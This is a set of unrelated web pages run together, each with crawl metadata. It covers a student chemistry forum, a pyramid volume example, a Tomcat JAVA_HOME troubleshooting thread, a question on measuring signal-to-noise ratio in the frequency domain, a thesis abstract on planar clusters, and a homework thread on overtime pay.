### Final The lecture outline for coordination compounds listed these as the assignments, but does anyone know which ones we do not have to do as we skipped over the naming part of the chapter? Thanks. Read: Ch 17.5, 17.6, Box 17.1, Toolbox 17.1, Table 17.4 Do Problems: 29, 31, 33, 35, 37 Sat Jun 02, 2018 9:00 pm Forum: Hybridization Topic: Hybridization Notation Replies: 3 Views: 104 ### Hybridization Notation On page 124, the textbook lists the notation of the hybridization of an ethane molecule as $\sigma$ (C2sp3,C2sp3). Is this the notation we need to use every time we are asked to write out the hybridization of a molecule? Thanks. Sat Jun 02, 2018 8:48 pm Forum: Hybridization Topic: Electron Promotion Replies: 1 Views: 74 ### Electron Promotion Can someone please explain the concept of electron promotion in the hybridization of orbitals? I am confused about what the purpose of it is. Thanks. Sat Jun 02, 2018 8:43 pm Forum: Hybridization Topic: Hybrid Orbitals Replies: 3 Views: 170 ### Hybrid Orbitals Can someone please explain what the following means in the textbook? It is on page 123 for reference. h1 s + px + py + pz h2 s - px - py + pz h3 s - px + py - pz h4 s + px - py - pz Tue May 22, 2018 11:15 am Forum: Lewis Structures Topic: Spacing in Structure for Molecules with an Expanded Octet Replies: 1 Views: 87 ### Re: Spacing in Structure for Molecules with an Expanded Octet I don't think this matters for test 3, but when we get more into the different structures, there are rules for this kind of thing, based on which repulsion is greatest. 
Tue May 22, 2018 11:12 am Forum: Lewis Structures Replies: 3 Views: 111 Hello, I am kind of confused about how to determine on which molecule the radical should go. Does it go on the central atom, or on one of the bonding atoms? Is there a specific rule for this? Thanks. Tue May 22, 2018 11:10 am Forum: Lewis Structures Topic: Test 3 [ENDORSED] Replies: 4 Views: 342 ### Test 3[ENDORSED] Hi, just making sure, I know it says that the test in chapter 3, but on the Chemical Bonds sheet there is also material from chapter 6. Chapter 6 is not on the exam, correct? Thu May 17, 2018 3:31 pm Forum: Resonance Structures Topic: 3.59 part c resonance structure? [ENDORSED] Replies: 3 Views: 166 ### Re: 3.59 part c resonance structure?[ENDORSED] When a question asks to draw out the lewis structure of a molecule that has resonance, do we need to draw all the different resonance structures for it, or just one? Thanks. Thu May 17, 2018 3:30 pm Forum: Lewis Structures Topic: Naming compounds Replies: 3 Views: 149 ### Naming compounds Do we need to know how to name compounds and understand the structure of compounds based on their names for test 3 for drawing Lewis structures? Thanks. Thu May 17, 2018 3:28 pm Forum: Lewis Structures Topic: Dots vs lines to represent electrons Replies: 8 Views: 259 ### Dots vs lines to represent electrons Hello, Can we use lines to represent two electrons when drawing lewis structures? Not just for bonds but also for lone pairs on atoms. We did not discuss this in lecture but in discussion this was brought up as an option. Thanks. Tue May 08, 2018 9:30 pm Forum: Heisenberg Indeterminacy (Uncertainty) Equation Topic: Module Questions 21 and 22 Replies: 1 Views: 166 ### Module Questions 21 and 22 Please help. I keep doing these two questions from the modules and I get the same wrong answer every time. For 21 I get C and for 22 I get D but those are incorrect. Does anyone know how to solve these? Thanks. 21. The electron is not confined to the nucleus and we now know that the size of an atom ... Tue May 08, 2018 1:50 pm Forum: Wave Functions and s-, p-, d-, f- Orbitals Topic: Paramagnetic vs Diamagnetic Replies: 2 Views: 158 ### Paramagnetic vs Diamagnetic What is the difference between Paramagnetic vs Diamagnetic? Thanks Tue May 08, 2018 12:12 pm Forum: Quantum Numbers and The H-Atom Topic: Question 5 Worksheet 4 Replies: 1 Views: 132 ### Question 5 Worksheet 4 This is the question, but I do not understand why the answer is 32. If it is quantum number 4, shouldn't that mean, 4s^2, 4p^6, and 4d^10 and so that would be 18 and then two electrons can fit in each one with opposite spins, so it would be 36? Can someone please clarify? Thanks. 5. What is the maxi... Tue May 08, 2018 9:09 am Forum: Quantum Numbers and The H-Atom Topic: Quantum Mechanics Worksheet #9 [ENDORSED] Replies: 4 Views: 347 ### Re: Quantum Mechanics Worksheet #9[ENDORSED] Hi, was just wondering where you got this worksheet from? Thanks Sun May 06, 2018 12:17 pm Forum: Ionic & Covalent Bonds Topic: Midterm Topics [ENDORSED] Replies: 33 Views: 1791 ### Re: Midterm Topics[ENDORSED] Taizha 1C wrote:Does anyone know if we need to know aufbau, hund, and pauli principles? Yes, we need to know these. Fri May 04, 2018 5:25 pm Forum: Properties of Light Topic: Frequency and Wavelength Replies: 3 Views: 180 ### Re: Frequency and Wavelength Frequency and wavelength are inversely proportional. 
This can be seen in the equation of c=\lambda \nu If you rearrange this so that lambda and nu are on opposites sides of the equation, \nu = (c/\lambda) then you see that as lambda increases, nu decreases and so they are inversely proportio... Fri May 04, 2018 5:20 pm Forum: *Particle in a Box Topic: Midterm [ENDORSED] Replies: 1 Views: 325 ### Midterm[ENDORSED] Do we need to know anything about particle in a box for the midterm? Thanks. Tue May 01, 2018 5:50 pm Forum: Ionic & Covalent Bonds Topic: Midterm Topics [ENDORSED] Replies: 33 Views: 1791 ### Re: Midterm Topics[ENDORSED] Just making sure, on the document sent to us by email and posted here, it says Chemistry 14A-1 11am class. Is this for our class or a different one? Thanks Mon Apr 23, 2018 4:37 pm Forum: Photoelectric Effect Topic: Module Questions 33 and 34 [ENDORSED] Replies: 3 Views: 1415 ### Module Questions 33 and 34[ENDORSED] Hello, I managed to figure out 33 was 7.22x10-19J, but I do not understand how to then use this to solve 34. Can someone please help me? Thanks. 33. Molybdenum metal must absorb radiation with a minimum frequency of 1.09 x 1015 s-1 before it can emit an electron from its surface. Answer the followin... Mon Apr 23, 2018 4:32 pm Forum: Photoelectric Effect Topic: Module Question 31 and 32 Replies: 1 Views: 77 ### Module Question 31 and 32 Hello, I am trying to answer question 32, and I get that question 31's answer is 550.7nm, but I don't understand how to now solve 32. Could someone please help me? Thanks. 31. This and the following question relates to the same metal used in a series of photoelectric experiments. A. If 3.607 x 10-19... Mon Apr 23, 2018 4:30 pm Forum: Photoelectric Effect Topic: Module Question 29 Replies: 4 Views: 117 ### Module Question 29 Hello, could someone please help me answer this question? Thanks Light hits a sodium metal surface and the velocity of the ejected electron is 6.61 x 105 m.s-1. The work function for sodium is 150.6 kJ.mol-1. B. How much energy is required to remove an electron from one sodium atom? A. 2.501 x 10-22... Sat Apr 21, 2018 6:36 pm Forum: Bohr Frequency Condition, H-Atom , Atomic Spectroscopy Topic: 1J=1kg.m^2.s^-2 Replies: 3 Views: 94 ### 1J=1kg.m^2.s^-2 Hi, I am trying to understand how 1J=1kg.m^2.s^-2. How are these units equal to each other? Does anyone know the proof? Thanks. Sat Apr 21, 2018 6:32 pm Forum: Properties of Electrons Topic: 1.57 [ENDORSED] Replies: 2 Views: 133 ### Re: 1.57[ENDORSED] It's not one of the problems required for test 2 so I would not be worried about it for now. OR Tue Apr 17, 2018 4:54 pm Forum: DeBroglie Equation Topic: Second test questions [ENDORSED] Replies: 3 Views: 245 ### Second test questions[ENDORSED] Hello, I was just wondering since test 2 is until 1.5 and not 1.6, which questions does that equate to from the ones assigned? If these are the assignments, Read: Ch 1 Do Problems: 3, 5, 7, 9, 11, 13, 15, 21, 23, 25, 27, 33, 37, 39, 41, 43, 55, 57, 59, 65, 67, 69, To which question is applicable for... Fri Apr 13, 2018 3:44 pm Forum: Properties of Light Topic: Value of Speed of Light** (Shoutout to Dr. Lavelle for calling me out in lecture today) [ENDORSED] Replies: 4 Views: 170 ### Re: Value of Speed of Light** (Shoutout to Dr. Lavelle for calling me out in lecture today)[ENDORSED] Ya, the value used in the solution manual was 2.998*10^8, but in class we were using the rounded 3.00*10^8. Fri Apr 13, 2018 3:35 pm Forum: SI Units, Unit Conversions Topic: Do we have to convert final answer to make it simpler? 
[ENDORSED] Replies: 4 Views: 204 ### Do we have to convert final answer to make it simpler?[ENDORSED] Hello, I was just wondering if during tests we are going to have to convert to the lowest possible SI unit that our final answer is given in. For example if we get that the wavelength is 551*10^-9 m, do we have to convert it to 551 nm or can we just leave it in the original form in meters? Thanks. Fri Apr 13, 2018 3:29 pm Forum: Properties of Light Topic: Value of speed of light [ENDORSED] Replies: 4 Views: 154 ### Value of speed of light[ENDORSED] Hello I was trying to answer question 1.7 and when I looked in the solution manual I saw that it put the speed of light constant to be 2.998*10^8, however in class we were using the rounded 3.00*10^8 so I was wondering which one we should use in calculations? Thanks. Sun Apr 08, 2018 12:09 pm Forum: Empirical & Molecular Formulas Topic: Finding the molecular formula [ENDORSED] Replies: 5 Views: 187 ### Re: Finding the molecular formula[ENDORSED] An example of this is if you have an empirical formula CH2O. The molar mass for this would be 12.011+(1.008*2)+15.99=30.017 gmol-1. If it told you that the molar mass of the molecule you are trying to find, in this case Glucose is 180.102 gmol-1, than you would divide 180.102 gmol-1 by 30.017, and y... Sun Apr 08, 2018 10:57 am Forum: Significant Figures Topic: Amount of significant figures in calculations. Replies: 2 Views: 108 ### Amount of significant figures in calculations. Are we supposed to round calculations that aren't the final answers? How many significant figures am I supposed to use throughout the question and then how many do I need to use to calculate the final answer? Thanks. Thu Apr 05, 2018 2:52 pm Forum: Significant Figures Topic: Questions F11 Replies: 4 Views: 198 ### Questions F11 In question F11 in part c it asks to determine the mass percentage composition: 12.2% N, 5.26% H, 26.9% P, and 55.6% O. When I solved for the moles of O I got 55.6g/16.00gmol=3.48 mol because the number with the least significant figures is 3, but the solutions manual says 3.475 mol. Is this an erro...
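For the last question (F11), a short sketch of the mole-ratio calculation may help. This is an addition, not part of the forum thread; the atomic masses are standard textbook values, and the note about rounding reflects common practice rather than anything stated above.

masses = {'N': 12.2, 'H': 5.26, 'P': 26.9, 'O': 55.6}        # grams per 100 g of compound
molar  = {'N': 14.007, 'H': 1.008, 'P': 30.974, 'O': 16.00}  # g/mol (standard values)

moles  = {el: masses[el] / molar[el] for el in masses}       # O gives ~3.475 mol
lowest = min(moles.values())
ratios = {el: round(moles[el] / lowest, 2) for el in moles}  # roughly N:1, H:6, P:1, O:4

print(moles)
print(ratios)
# Intermediate values are normally carried at full precision (hence the 3.475 mol
# in the solutions manual); only the final answer is rounded to significant figures.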
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 1, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7648503184318542, "perplexity": 2567.8690604294748}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514575402.81/warc/CC-MAIN-20190922073800-20190922095800-00173.warc.gz"}
https://istopdeath.com/find-the-volume-pyramid-567/
# Find the Volume pyramid (5)(6)(7)

The volume of a pyramid is equal to $$V=\frac{1}{3}\,l\,w\,h$$. Substitute the values of the length $$l=5$$, the width $$w=6$$, and the height $$h=7$$ into the formula to find the volume of the pyramid:

$$V=\frac{1}{3}(5)(6)(7)=\frac{210}{3}=70$$
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8725098967552185, "perplexity": 1869.0144207539165}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499804.60/warc/CC-MAIN-20230130070411-20230130100411-00252.warc.gz"}
http://www.coderanch.com/t/565349/Tomcat/JAVA-HOME-point-JDK-JRE
Big Moose Saloon Search | Java FAQ | Recent Topics | Flagged Topics | Hot Topics | Zero Replies Register / Login Win a copy of Spring in Action this week in the Spring forum! # JAVA_HOME should point to a JDK not a JRE nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi, I am not able to start my tomcat. It is giving the below gien error: The JAVA_HOME environment variable is not defined correctly This environment variable is needed to run this program NB: JAVA_HOME should point to a JDK not a JRE I have done th following settings in the user variables: JAVA_HOME: C:\Program Files\Java\jdk1.6.0_24 CLASSPATH: E:\softwares\Tomcatnew\Tomcat\apache-tomcat-6.0.32\lib PATH: C:\Program Files\Java\jdk1.6.0_24\lib;%JAVA_HOME%\bin I have done th following settings in the system variables: JAVA_HOME: C:\Program Files\Java\jdk1.6.0_24 CLASSPATH: E:\softwares\Tomcatnew\Tomcat\apache-tomcat-6.0.32\lib PATH: %JAVA_HOME%\bin Please let me know what settings am i missing here. Rob Spoor Sheriff Joined: Oct 27, 2005 Posts: 19719 20 Are those actually user environment variables? Because unless Tomcat runs under your user account it doesn't see those. Change the JAVA_HOME variable into a system variable. You can also drop the other two as far as Tomcat is concerned, it doesn't need those. Especially the PATH variable is dangerous, as it removes all other PATH entries. SCJP 1.4 - SCJP 6 - SCWCD 5 - OCEEJBD 6 nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi Rob, The same values are there in the system variables as well. Tried deleting the PATH as well. No progress. Same result. John Jai Bartender Joined: May 31, 2011 Posts: 1776 Any particular reason you have the \lib under path? Keep only the System variables and try removing the \lib from the Path variable. Let this be @ first path - C:\Program Files\Java\jdk1.6.0_24\bin. Try java -version in the cmd prompt and confirm if your path is right. Open a new cmd prompt after altering these values. nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi John, No particular reason why lib was there. I modified the PATH to C:\Program Files\Java\jdk1.6.0_24\bin Still the same error. Do i need to restart the sytem after these changes? What i did was i modified the PATH & restarted the Tomcat. John Jai Bartender Joined: May 31, 2011 Posts: 1776 I have seen this error recently and resolved by configuring JAVA_HOME as a System Variable. Just after configuring and starting Tomcat again it worked well. John Jai Bartender Joined: May 31, 2011 Posts: 1776 Try below commands and check if you are getting desired results - nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi John, I got the following: C:\Users\nigupta6>echo %JAVA_HOME% C:\Program Files\Java\jdk1.6.0_24 C:\Users\nigupta6>echo %PATH% C:\Program Files\Java\jdk1.6.0_24\bin;C:\Program Files\Java\jdk1.6.0_24\bin John Jai Bartender Joined: May 31, 2011 Posts: 1776 Yikes - So the JAVA_HOME is pointed to a JDK but still you get the error like JAVA_HOME should point to a JDK and not a JRE? Is the error still occurring while starting Tomcat? nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 yes ji... Tel me do we need to map from java build path in eclipse? Akhilesh Trivedi Ranch Hand Joined: Jun 22, 2005 Posts: 1527 nattynids Gupta wrote:yes ji... Tel me do we need to map from java build path in eclipse? Are you starting Tomcat from within Eclipse? Try restarting eclipse. Keep Smiling Always — My life is smoother when running silent. 
-paul [FAQs] [Certification Guides] [The Linux Documentation Project] nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Thanks all... The issue was the incorrect path in the Catalina file in Tomcat... John Jai Bartender Joined: May 31, 2011 Posts: 1776 he he... thanks for sharing that kaiser rommel Greenhorn Joined: Apr 23, 2014 Posts: 1
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9406004548072815, "perplexity": 18182.309624600693}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507445299.20/warc/CC-MAIN-20141017005725-00370-ip-10-16-133-185.ec2.internal.warc.gz"}
https://dsp.stackexchange.com/questions/14862/measure-the-snr-of-a-signal-in-the-frequency-domain
# Measure the SNR of a signal in the frequency domain? How do you measure the SNR of a sinewave in the frequency domain? (Assuming no filtering.) Suppose: $$x(n) = s(n) + n(n)$$ Create the signal (nCycles of a sinewave) in MATLAB...: sampleRate = 1024; f0 = sampleRate/8; nCycles = 11; time = 0:1/sampleRate:nCycles/f0; signal = sin(2*pi*f0*time); Create the noise and scale it by the desired SNR... SNR = 10; noise = randn(size(signal)); % scale the noise to obtain the desired SNR noise = noise / norm(noise) * norm(signal) / 10^(SNR/20); x = signal + noise; Calculate the resulting SNR (in the time domain): actualSNR = 20*log10(norm(signal)/norm(x - signal)); disp(['SNR = ',num2str(actualSNR),' dB']) Plot the noisy signal in time and frequency subplot(2,1,1) % plot the signal in time plot(time,signal) hold on; grid on plot(time,x,'r') % plot the noisy signal in frequency NFFT = 4096; X = fftshift(fft(x,NFFT)); X = X/max(abs(X)); f = sampleRate/2*linspace(-1,1,NFFT); subplot(2,1,2) plot(f,20*log10(abs(X))) grid on; • Specifying a SNR without mention of a bandwidth has little meaning. I.e., for a pure tone, the narrower the bandwidth, the higher the SNR. That's one of the main reasons to use a filter - increase the SNR. – rickhg12hs Mar 8 '14 at 20:45 • I disagree with you. Since I didn't mention any filters, it's quite clear what the bandwidth of interest is. – Seth Mar 10 '14 at 15:43 • Well, maybe in your signal world. Why someone wouldn't use a simple filter to increase the SNR is at least questionable. Nice OP edit. – rickhg12hs Mar 11 '14 at 1:50 It can be a little tricky. If your sine wave happens to fall at an FFT bin center, things are a little easier. If your sine wave happens to not fall at a bin center, you have to consider spectral leakage. You'll also need to consider how your window function affects your signal. A simple technique to estimate the signal power would be to sum the squared magnitudes of the FFT bins with most of the signal's energy (i.e. the largest bins). To get the noise energy, sum the squared magnitude of all of the other bins. This will get you close. If you know the SNR per sample in the time domain (SNRt) the SNR in the frequency domain (SNRf) will be $$SNR_f = SNR_t \sqrt{N}$$ where N is the number of non zero elements in the basis vector in the Fourier transform. The fastest Fourier transforms (FFT with $n=2^{integer}$) has most zeros and thus lowest SNRf. The highest SNRf comes with $N$ as a prime number with no zeros in the basis vectors, which is also thus the most arithmetically intense choice of sample size. Quality costs. Also pay attention to the fact that the number of zeros in the basis vectors in the FFT depends on the frequency leading to SNRf being frequency dependent. Lowest SNRf is at the middle frequency where every second element of the cosine part is zero. Now tell me why people still use sample sets of 2^integer when it is the choice of lowest quality? Today we have the means to do the extra computations of a zero free Fourier transform. It would led to better image quality, better sound and higher data rates. • How would you know the SNR per sample in the time domain? Can you elaborate on "The highest SNRf comes with N as a prime number with no zeros in the basis vectors"? – Seth Nov 10 '14 at 4:46 • SNR in time domain is either given, measured, assumed or calculated. I was specifically thinking about the cosine transformation or the even FFT when talking about zero free basis. 
Check for example the basis vector link which uses samle size 2^4=16 and having half of the components zero. Change that to 17 and get no zeros link – David Jonsson Nov 12 '14 at 12:51 • The intent of the question was to determine the SNR given no information about the time domain. Doesn't the FFT become the DFT if N is not a power of 2? – Seth Nov 12 '14 at 22:06 • Sure, the inverse is so similar, just a change of sign in the exponent, that the relation holds. So for the inverse Fourier transform, with signal to noise ratio in a specific frequency SNRif, the SNR in the resulting time domain would be SNRit = √N SNRif – David Jonsson Nov 23 '14 at 21:03 • Addition. With a properly scaled transformation there is no change in variance or standard deviation in a Fourier transform, but there is an increase in the expected value for the DC signal. It grows as $$µ_f = \sqrt N µ_t$$ this is not dependent on the number of zeros in the basis vectors. – David Jonsson Dec 18 '14 at 16:09 Here is a better answer (than the one I gave before) based on properly scaled Fourier transformations where basis vectors are normalized to length 1. Noise, a normal distribution of a random variable, has the following variance, based on https://en.wikipedia.org/wiki/Variance#Basic_properties for variance of a linear combination with no correlation, applies to both the Fourier transformation and it's inverse $${Var}\left(\sum _{{i=1}}^{{N}}a_{i}X_{i}\right) = \sum _{{i=1}}^{{N}}a_{i}^{2}\operatorname {Var}(X_{i})$$ The same variance for all Xi means $${Var}\left(\sum _{{i=1}}^{{N}}a_{i}X_{i}\right) = \sum _{{i=1}}^{{N}}a_{i}^{2}\operatorname {Var}(X) = \left(\sum _{{i=1}}^{{N}}a_{i}^{2}\right)\operatorname {Var}(X)$$ Example 1 The first row DC basis vector in a even Fourier transform $$\left(\frac{1}{\sqrt N } , \frac{1}{\sqrt N } , \frac{1}{\sqrt N } , ... \right)$$ gives a variance of $$Var(Transform) = N \left( \frac{1}{\sqrt N } \right)^2 Var(X) = Var(X)$$ Example 2 A basis vector in an even fast Fourier transform with a wavelength of 4 samples, a repeating series of $$\left( \sqrt{\frac{2}{N}} , 0 , -\sqrt{\frac{2}{N}} , 0 , ... \right)$$ This is the basis vector with most zero elements, every second. The variance becomes $$Var(Transform) = \frac{N}{2} \left( \sqrt{\frac{2}{N}} \right)^2 Var(X) = Var(X)$$ So variance, and thus standard deviation, is independent of basis vectors and zero elements. But what happens to the signal, the expected value? Maybe someone else can show that? Another solution can be to model the noise using the non-sine frequencies. This relies on having a reasonable parametric model whose parameters can be estimated from the non-sine frequencies. E.g. if you know the noise is white or pink, this is fairly straightforward. Once you've got the parameters estimated, it's also easy to estimate how much noise there is at the sine frequency, and sum up all noise contributions.
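Here is a sketch of the bin-summing estimate described in the first answer, written with NumPy rather than MATLAB (an addition, not part of the thread). The signal parameters mirror the question; treating the peak bin plus/minus two neighbours as "signal" is an assumption, and no window is applied, so spectral leakage is handled only crudely.

import numpy as np

sample_rate = 1024
f0 = sample_rate / 8
t = np.arange(0, 11 / f0, 1 / sample_rate)        # 11 cycles, as in the question
signal = np.sin(2 * np.pi * f0 * t)

noise = np.random.randn(t.size)
noise *= np.linalg.norm(signal) / np.linalg.norm(noise) / 10 ** (10 / 20)  # ~10 dB SNR
x = signal + noise

X = np.fft.rfft(x)
power = np.abs(X) ** 2
peak = int(np.argmax(power))
signal_bins = np.arange(max(peak - 2, 0), peak + 3)   # assumption: peak +/- 2 bins are "signal"

p_signal = power[signal_bins].sum()
p_noise = power.sum() - p_signal
print(10 * np.log10(p_signal / p_noise))   # rough estimate of the ~10 dB set above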
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8891549706459045, "perplexity": 770.1228017392398}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250614086.44/warc/CC-MAIN-20200123221108-20200124010108-00087.warc.gz"}
http://cvgmt.sns.it/paper/2911/
# On the isoperimetric properties of planar N-clusters

created by caroccia on 22 Jan 2016
[BibTeX]
PhD Thesis
Inserted: 22 jan 2016
Last Updated: 22 jan 2016
Year: 2015

Notes: This thesis aims to highlight some isoperimetric questions involving so-called $N$-clusters. We first briefly recall the theoretical framework we are adopting; this is done in Chapter One. In Chapter Two we focus on the standard isoperimetric problem for planar $N$-clusters for large values of $N$ and provide an equidistribution energy-type result under suitable assumptions. The third chapter is devoted to a stability result for the hexagonal honeycomb tiling. In the fourth chapter we consider a generalization of the Cheeger constant, defined as the minimization of a suitable energy over the class of $N$-clusters, and we show how this problem is related to the optimal partition problem for the first Dirichlet eigenvalue of the Laplacian introduced by Caffarelli and Fang-Hua Lin in 2007. We conclude, in Chapter Five, with some remarks and some possible future directions of investigation.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9040785431861877, "perplexity": 505.86881344745393}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891812880.33/warc/CC-MAIN-20180220050606-20180220070606-00091.warc.gz"}
http://openstudy.com/updates/51159021e4b09e16c5c82060
## anonymous 3 years ago

Joelle earns her regular pay of $7.50 per hour for up to 40 hours of work in a week. For each hour over 40 hours in a week, she is paid 1 and 1/2 times her regular pay. How much does Joelle earn for a week in which she works 42 hours?

1. anonymous: Is the answer $472.50?
2. anonymous: $7.50 an hour if she works up to 40 hours; $7.50 x 1.5 for each hour beyond 40.
3. anonymous: No, it is not.
4. anonymous: Please tell me your working: how did you arrive at that answer?
5. anonymous: I multiplied 7.50 by 1.5 = 11.25, then I multiplied 11.25 by 42, which equals 472.50.
6. anonymous: That is wrong, because the 1.5 rate only applies to the hours she works beyond 40.
7. anonymous: She did. She worked 42 hours.
8. anonymous: No, no, no.
9. anonymous: OK, explain.
10. anonymous: "More than" 40 hours; the key words are "more than".
11. jim_thompson5910: That answer would be correct if she got paid 1.5 times her regular pay of $7.50 for the entire 42 hours, but that overtime bonus only applies to the additional 2 hours (not the full 42 hours).
12. anonymous: $7.50 an hour for up to 40 hours; $7.50 x 1.5 for hours over 40. How many hours did she work beyond 40? She worked 40 + 2 = 42 hours in total, so do you see that she has worked 2 hours over 40?
13. stamp: $$r_{regular}=750\ \text{cents/hour}$$ $$r_{overtime}=150\%\;r_{regular}=\tfrac{150}{100}\cdot 750=1125\ \text{cents/hour}$$ pay = regular + overtime: $$pay_{cents}=750(40)+1125(2)$$
14. jim_thompson5910: You have to do it in pieces: calculate her total pay for working 40 hours at $7.50 an hour, then add on the bonus pay for working 2 hours at 1.5 × 7.50 = 11.25 dollars an hour.
15. anonymous: Yes, @jim_thompson5910 says it well: she has worked an additional two hours on top of the 40 base hours.
16. anonymous: jayds: yes
17. anonymous: 311.25?
18. anonymous: Yes, you are right.
19. anonymous: Wait.
20. anonymous: I think you may have mistyped it.
21. jim_thompson5910: I'm getting 322.5, so you're 11.25 off somehow.
22. anonymous: In the calculator.
23. jim_thompson5910: You must have only calculated 1 additional hour of overtime instead of 2.
24. stamp: 300 + 22.50 = 322.50
25. anonymous: First 40 hours = base pay of $7.50 per hour; additional 2 hours = base pay × 1.5 = 7.50 × 1.5 = 11.25 per hour.
26. anonymous: stamp: how did you get 322.50?
27. jim_thompson5910: Regular: 40 hours at $7.50 an hour = $300 in total pay. Overtime: 2 hours at $11.25 an hour = $22.50 in total pay. Overall, she made 300 + 22.50 = 322.50 dollars working 42 hours.
28. anonymous: Ohhh, I understand now. Thank you!
29. jim_thompson5910: You're welcome.
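A tiny script (added; not part of the thread) that reproduces jim_thompson5910's piecewise calculation:

def weekly_pay(hours, base_rate=7.50, overtime_multiplier=1.5, regular_cap=40):
    regular_hours = min(hours, regular_cap)
    overtime_hours = max(hours - regular_cap, 0)
    return regular_hours * base_rate + overtime_hours * base_rate * overtime_multiplier

print(weekly_pay(42))   # 322.5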
